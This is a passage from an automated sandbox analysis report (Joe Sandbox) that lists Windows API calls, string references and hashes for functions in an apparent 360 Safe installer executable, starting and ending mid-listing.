                                                                                                                                                                        • Part of subcall function 001CA6F2: PathCombineW.SHLWAPI(?,?,?), ref: 001CA784
                                                                                                                                                                        • Part of subcall function 001CA6F2: _wcscat.LIBCMT ref: 001CA796
                                                                                                                                                                        • Part of subcall function 001CA6F2: PathFileExistsW.SHLWAPI(?), ref: 001CA7A4
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000008,001CD144,?,00000000,000000CE,DLL,00000014,0017BCDE), ref: 001D0593
                                                                                                                                                                      • SHCreateDirectory.SHELL32(00000000,?,?), ref: 001D05C4
                                                                                                                                                                        • Part of subcall function 001D0426: SetupIterateCabinetW.SETUPAPI(00000000,00000000,001D0376,00000000), ref: 001D0454
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?), ref: 001D05FA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePath_memset$Delete$CabinetCombineCreateDirectoryExistsH_prolog3IterateSetupTemp_wcscat
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 833124302-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00178116
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0017813D
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00178158
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 0017815F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$CallbackDispatchDispatcherPeekTranslateUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1533324876-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 001A6871
                                                                                                                                                                      • _memset.LIBCMT ref: 001A68A0
                                                                                                                                                                      • URLDownloadToCacheFileW.URLMON(00000000,?,?,00000104,00000000,00000000), ref: 001A68B8
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?), ref: 001A68C8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Download$CacheDelete_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1835763934-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAAsyncSelect.WS2_32(?,00000000,?,00000000), ref: 5F520382
                                                                                                                                                                      • shutdown.WS2_32(?,00000002), ref: 5F52038D
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 5F5203A3
                                                                                                                                                                      • WSACancelAsyncRequest.WS2_32(?), ref: 5F5203D8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Async$CancelRequestSelectclosesocketshutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3577682533-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00181F0D
                                                                                                                                                                        • Part of subcall function 0017DEB6: GetFileAttributesW.KERNEL32(?), ref: 0017DEBA
                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 00181F43
                                                                                                                                                                        • Part of subcall function 00181F06: CreateDirectoryW.KERNEL32(?,00000000), ref: 00181F75
                                                                                                                                                                        • Part of subcall function 00181F06: GetLastError.KERNEL32 ref: 00181F7F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesCreateDirectoryErrorFileH_prolog3Last_wcsrchr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2010142796-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadIconW.USER32(000000CD), ref: 00196699
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,00000284), ref: 00196703
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,00000284), ref: 0019670B
                                                                                                                                                                      • SetTimer.USER32(?,00002711,000007D0,00000000), ref: 0019671B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Icon$NotifyShell_$LoadTimer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2558709860-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindow.USER32 ref: 001B14C3
                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 001B14D0
                                                                                                                                                                      • PostMessageW.USER32(?,000008C7,?,?), ref: 001B14F3
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 001B1500
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$EnabledInvalidateMessagePostRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2423392173-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 001EE99E
                                                                                                                                                                        • Part of subcall function 001F30A0: __FindPESection.LIBCMT ref: 001F30FB
                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 001EE9AE
                                                                                                                                                                      • __freeptd.LIBCMT ref: 001EE9B8
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 001EE9C1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3182216644-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0016D244
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0016D25B
                                                                                                                                                                        • Part of subcall function 001E5546: _malloc.LIBCMT ref: 001E5560
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                      • String ID: P "
                                                                                                                                                                      • API String ID: 4063778783-3541668580
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 5F4D935C
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 5F4D936A
                                                                                                                                                                        • Part of subcall function 5F4D9134: _wcslen.LIBCMT ref: 5F4D913B
                                                                                                                                                                      Strings
                                                                                                                                                                      • [%d.] __open_file create file(%s) fail! error code is %d, xrefs: 5F4D9379
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorFileLast_wcslen
                                                                                                                                                                      • String ID: [%d.] __open_file create file(%s) fail! error code is %d
                                                                                                                                                                      • API String ID: 3865106863-2798064650
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F52325B: __EH_prolog3.LIBCMT ref: 5F523262
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F525F87
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountH_prolog3Tick
                                                                                                                                                                      • String ID: agt.p.360.cn$tr.p.360.cn
                                                                                                                                                                      • API String ID: 3287309161-3328026606
                                                                                                                                                                      • Opcode ID: e03a3178b70137da0f0537b213af2a89e5da64b40b944ecaf423f8cf115ac406
                                                                                                                                                                      • Instruction ID: ba84c914a341efd330d37d54e80a253a782f0e99dc169d8b53db37a04efd6b17
                                                                                                                                                                      • Opcode Fuzzy Hash: e03a3178b70137da0f0537b213af2a89e5da64b40b944ecaf423f8cf115ac406
                                                                                                                                                                      • Instruction Fuzzy Hash: 26F0B4F22023242BD600569A9D54BBB77DDDB94A75F00012EFA15D71C0DF656C4187B4
                                                                                                                                                                      APIs
                                                                                                                                                                      • SHGetValueW.SHLWAPI(80000001,Software\360Safe,EnableUE,?,00000000,?,&pid=,&ver=), ref: 001A670E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID: EnableUE$Software\360Safe
                                                                                                                                                                      • API String ID: 3702945584-3756293347
                                                                                                                                                                      • Opcode ID: d66c050cb896e318d4f00c3026742cecf908fb8944d94c3cd7078f9f50e2fb1d
                                                                                                                                                                      • Instruction ID: e29f95df6f1122511143c0c71105476268ebdd7070789d76a752212b6c306f3f
                                                                                                                                                                      • Opcode Fuzzy Hash: d66c050cb896e318d4f00c3026742cecf908fb8944d94c3cd7078f9f50e2fb1d
                                                                                                                                                                      • Instruction Fuzzy Hash: CCE06D72E10208FACB00DBE09C05BCEB7FCAB04705F1081B6A502E2080EA709754CB50
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message_memset
                                                                                                                                                                      • String ID: $
                                                                                                                                                                      • API String ID: 2116056029-3993045852
                                                                                                                                                                      • Opcode ID: 6cbd5c709c0cf4bf34dbabb6d94edbe32329bcb822739b2eaa162f1f2dadc732
                                                                                                                                                                      • Instruction ID: f1174133699b2d030f71c69ba89e4dd3e45e18149e337fcb2187a30bb9d12908
                                                                                                                                                                      • Opcode Fuzzy Hash: 6cbd5c709c0cf4bf34dbabb6d94edbe32329bcb822739b2eaa162f1f2dadc732
                                                                                                                                                                      • Instruction Fuzzy Hash: 60E0BF71D002189BEB10DB99DD4ABDEB7F8EB4C714F100165E619B7180E7B6EA048BE5
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShowWindow.USER32(?,00000005,D!,0017AFA3,?), ref: 001967FA
                                                                                                                                                                      • ShowWindow.USER32(?,00000000,D!,0017AFA3,?), ref: 00196809
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                      • String ID: D!
                                                                                                                                                                      • API String ID: 1268545403-911024508
                                                                                                                                                                      • Opcode ID: 618b15a104b9d0bf51c6da0226d58eb04748329b2969fe393295db1bb520a7cc
                                                                                                                                                                      • Instruction ID: 0ba9b6180d6c4121a4174ce26bdfb29edb6ab7c930054fcdbc5e681739e64fe3
                                                                                                                                                                      • Opcode Fuzzy Hash: 618b15a104b9d0bf51c6da0226d58eb04748329b2969fe393295db1bb520a7cc
                                                                                                                                                                      • Instruction Fuzzy Hash: F6E01A31145700FAEA21AB20DC0ABD9BAA1EB20705FA1882AB181620A0E7B12840CA55
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                                      • Opcode ID: 43382c89c566047df1a79cefd5c992ac94308cba32c9b50fa856fa8ab6d43727
                                                                                                                                                                      • Instruction ID: 4afd08fb82608be9f8e3e4c6a7b3fee1cd7ff185dea7057bf017282f55c31986
                                                                                                                                                                      • Opcode Fuzzy Hash: 43382c89c566047df1a79cefd5c992ac94308cba32c9b50fa856fa8ab6d43727
                                                                                                                                                                      • Instruction Fuzzy Hash: 53E15A75900609EFCB15EFA4C9819EDBBF5BF28300F10452EF55AA7691EB30AA45CF90
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001628B3
                                                                                                                                                                      • _malloc.LIBCMT ref: 001629B5
                                                                                                                                                                      • SetLastError.KERNEL32(00000008,00002000,?,00000000), ref: 001629C5
                                                                                                                                                                        • Part of subcall function 00165690: _malloc.LIBCMT ref: 0016569C
                                                                                                                                                                        • Part of subcall function 00165690: SetLastError.KERNEL32(00000008,00000000,0016291E,00000000,00002000,?,00000000), ref: 001656AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast_malloc$_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1834304950-0
                                                                                                                                                                      • Opcode ID: c60c2a6b2cdd2fcad2807329fa1c17e3f7573e89f586d2f5c171568a14896bea
                                                                                                                                                                      • Instruction ID: a23e214d448f7c0fc8a38ce128eaeb9682ff9a3e9b21678b1d90bf05d927e760
                                                                                                                                                                      • Opcode Fuzzy Hash: c60c2a6b2cdd2fcad2807329fa1c17e3f7573e89f586d2f5c171568a14896bea
                                                                                                                                                                      • Instruction Fuzzy Hash: D3B177B19087419BD720DF25D885B6FB7E4BBD8308F14492DF89987241E7B0E958CB93
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00000000,?,00000000,?,?,00161043,?), ref: 00164CF6
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000008,?,00000000,?,00000000,?,00000000,?,?,00161043,?), ref: 00164D13
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,00000000,?,?,00161043,?), ref: 00164D98
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Pointer$Read
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2010065189-0
                                                                                                                                                                      • Opcode ID: f8f3c6149dbd1b091d6829b491b09e703e20e8f0e8df1a03963d126d97ba0f7f
                                                                                                                                                                      • Instruction ID: 9f013aa3db5ee6e7db0060f05bbbffd2cb3c29b04fc449b01fb2a18009516438
                                                                                                                                                                      • Opcode Fuzzy Hash: f8f3c6149dbd1b091d6829b491b09e703e20e8f0e8df1a03963d126d97ba0f7f
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E315971A08301AFD310EF95DD80A6BB3E9EBA8748F10492DF89597280EB70DD648B53
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Rect$ClientH_prolog3Offset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 236044050-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001C8838
                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 001C8845
                                                                                                                                                                        • Part of subcall function 001EEDC6: __wsplitpath_helper.LIBCMT ref: 001EEE08
                                                                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001C8874
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DiskFreeSpace__wsplitpath__wsplitpath_helper_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1401654830-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001AECF7
                                                                                                                                                                        • Part of subcall function 001AB33C: KillTimer.USER32(?,00002710), ref: 001AB344
                                                                                                                                                                        • Part of subcall function 001AEC81: GetModuleHandleW.KERNEL32(?), ref: 001AEC97
                                                                                                                                                                        • Part of subcall function 001AEC81: FindResourceW.KERNEL32(?,?,?), ref: 001AECA8
                                                                                                                                                                        • Part of subcall function 001AEC81: SizeofResource.KERNEL32(?,00000000), ref: 001AECB7
                                                                                                                                                                        • Part of subcall function 001AEC81: LoadResource.KERNEL32(?,00000000), ref: 001AECC1
                                                                                                                                                                        • Part of subcall function 001AEC81: LockResource.KERNEL32(00000000), ref: 001AECC8
                                                                                                                                                                      • GetParent.USER32(000000FF), ref: 001AEDA8
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000BD0,00000000,00000000), ref: 001AEDB8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$FindH_prolog3HandleKillLoadLockMessageModuleParentSendSizeofTimer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3209458795-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetIpAddrTable.IPHLPAPI(00000000,?,00000000), ref: 00195B74
                                                                                                                                                                      • _malloc.LIBCMT ref: 00195B81
                                                                                                                                                                        • Part of subcall function 001E5674: __FF_MSGBANNER.LIBCMT ref: 001E5697
                                                                                                                                                                        • Part of subcall function 001E5674: __NMSG_WRITE.LIBCMT ref: 001E569E
                                                                                                                                                                        • Part of subcall function 001E5674: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,001F05A7,?,00000001,?,?,001F3329,00000018,0023EF60,0000000C,001F33BA), ref: 001E56EB
                                                                                                                                                                      • GetIpAddrTable.IPHLPAPI(00000000,?,00000000,00000000,?,00000000), ref: 00195B97
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddrTable$AllocateHeap_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3107517213-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 0018F32D
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,00000000,0022E544,0000005C,00000008), ref: 0018F37D
                                                                                                                                                                      • SHCreateDirectory.SHELL32(00000000,?), ref: 0018F389
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDirectoryExistsFileH_prolog3Path
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2789380810-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,?,00000080,00000000,?,00198D5A,00000000,?,001D68E0,?,00000000,00000000,00000748), ref: 001D6C90
                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 001D6CB1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile_wcsncpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4108816585-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 5F516C75
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,000001FE,?,?,00000001), ref: 5F516C96
                                                                                                                                                                      • _wcscpy.LIBCMT ref: 5F516CA8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue_memset_wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4123947661-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 0017CE75
                                                                                                                                                                        • Part of subcall function 0017CBDE: _wcslen.LIBCMT ref: 0017CBEF
                                                                                                                                                                      • _memset.LIBCMT ref: 0017CEE2
                                                                                                                                                                      • GetLongPathNameW.KERNEL32(00000000,?,00000104), ref: 0017CEF9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3_LongNamePath_memset_wcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3807393607-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 001B2FE5
                                                                                                                                                                        • Part of subcall function 0019D649: BeginPaint.USER32(?,?), ref: 0019D65B
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 001B3038
                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 001B3045
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Paint$BeginH_prolog3_Window
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4095823405-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00162744,?), ref: 00162784
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001627CD
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001627D7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle$CreateFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1378612225-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteFileW.KERNEL32(001D059E,?,0024CDA4,?,001D059E,?), ref: 001D0323
                                                                                                                                                                      • CreateFileW.KERNEL32(001D059E,C0000000,00000001,00000000,00000001,00000080,00000000,?,001D059E,?), ref: 001D033E
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001D0367
                                                                                                                                                                      Memory Dump Source
